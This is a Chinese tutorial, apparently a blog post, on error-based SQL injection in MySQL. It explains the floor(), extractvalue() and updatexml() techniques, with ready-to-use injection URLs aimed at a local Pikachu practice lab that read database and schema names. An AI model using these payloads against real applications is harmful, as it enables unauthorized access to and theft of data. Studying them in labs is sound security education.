SQL注入-报错注入

目录

一、报错注入的定义

二、利用报错注入的前提

三、报错注入的优缺点

四、构造报错注入的基本步骤

五、常见的报错注入函数

六、报错注入演示（只演示前三个）

 1.利用floor()函数进行报错注入

 （1）获取当前数据库库名 ：

 2.利用extractvalue()函数进行报错注入

（1）获取当前数据库库名 

（2）获取所有的数据库库名

（3）使用substr()函数截取所有的数据

3.利用updatexml()函数进行报错注入         

（1）获取当前数据库库名

（2）获取所有数据库库名

---

一、报错注入的定义

报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。

二、利用报错注入的前提

1.页面上没有显示位，但是必须有SQL语句执行错误的信息。

三、报错注入的优缺点

1.优点：不需要显示位，如果有显示位建议使用union联合查询。

2.缺点：需要有SQL语句的报错信息。

四、构造报错注入的基本步骤 构造目标查询语句；选择报错注入函数；构造报错注入语句；拼接报错注入语句； 五、常见的报错注入函数 floor();extractvalue();updatexml();geometrycollection();multipoint();polygon();multipolygon();linestring();multilinestring();exp(); 六、报错注入演示（只演示前三个）  1.利用floor()函数进行报错注入

主要报错原因为：count()+rand()+group_by()导致主键重复。

因为floor(rand(0)*2)的重复性，导致group by语句出错。group by key的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，如果key存在于临时表中，则不在临时表中更新临时表的数据；如果key不在临时表中，则在临时表中插入key所在行的数据。

 （1）获取当前数据库库名 ：

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'union select 1,count(*) from information_schema.tables group by concat(0x7e,database(),0x7e,floor(rand(0)*2))--+&submit=æ¥è¯¢

查询结果：

 2.利用extractvalue()函数进行报错注入

extractvalue()函数为MYSQL对XML文档数据进行查询的XPATH函数。

语法： extractValue(xml_document, xpath_string)；

第一个参数：XML_document是String格式，为XML文档对象的名称，

第二个参数：XPath_string (Xpath格式的字符串)；

Xpath定位必须是有效的，否则则会发生错误；所以可以在这个位置植入表达式，做执行后报错

!注意:一次返回值最大为32位,当数据库名大于32,需要结合其他方式使用（可以使用substr())；

（1）获取当前数据库库名 

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'and extractvalue(1,concat(1,(select database())))--+&submit=æ¥è¯¢

查询结果：

（2）获取所有的数据库库名

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'and extractvalue(1,concat(1,(select group_concat(schema_name)from information_schema.schemata)))--+&submit=æ¥è¯¢

查询结果：

 由于extractvalue()函数一次性最大只返回32位，所以接下来可以使用substr()函数输入所有的数据

（3）使用substr()函数截取所有的数据

    http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and extractvalue(1,concat(1,(select substr((select group_concat(schema_name) from information_schema.schemata),1,20)))) --++&submit=æ¥è¯¢

查询结果：

3.利用updatexml()函数进行报错注入         

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

语法：UPDATEXML (xml_document, XPathstring, new_value)。

第一个参数：xml_document，文档名称。

第二个参数：XPathstring (Xpath格式的字符串)，做内容定位。

第三个参数：new_value，String格式，替换查找到的符合条件的值。

 !注意:一次返回值最大为32位,当数据库名大于32,需要结合其他方式使用（可以使用substr())；

（1）获取当前数据库库名

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--++&submit=æ¥è¯¢

查询结果：

 ！0x7e为“~”。

（2）获取所有数据库库名

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--++&submit=æ¥è¯¢

 group_concat()函数表示将数据一次性输出。

查询结果：

 如果需要上边工具的小伙伴可以私信我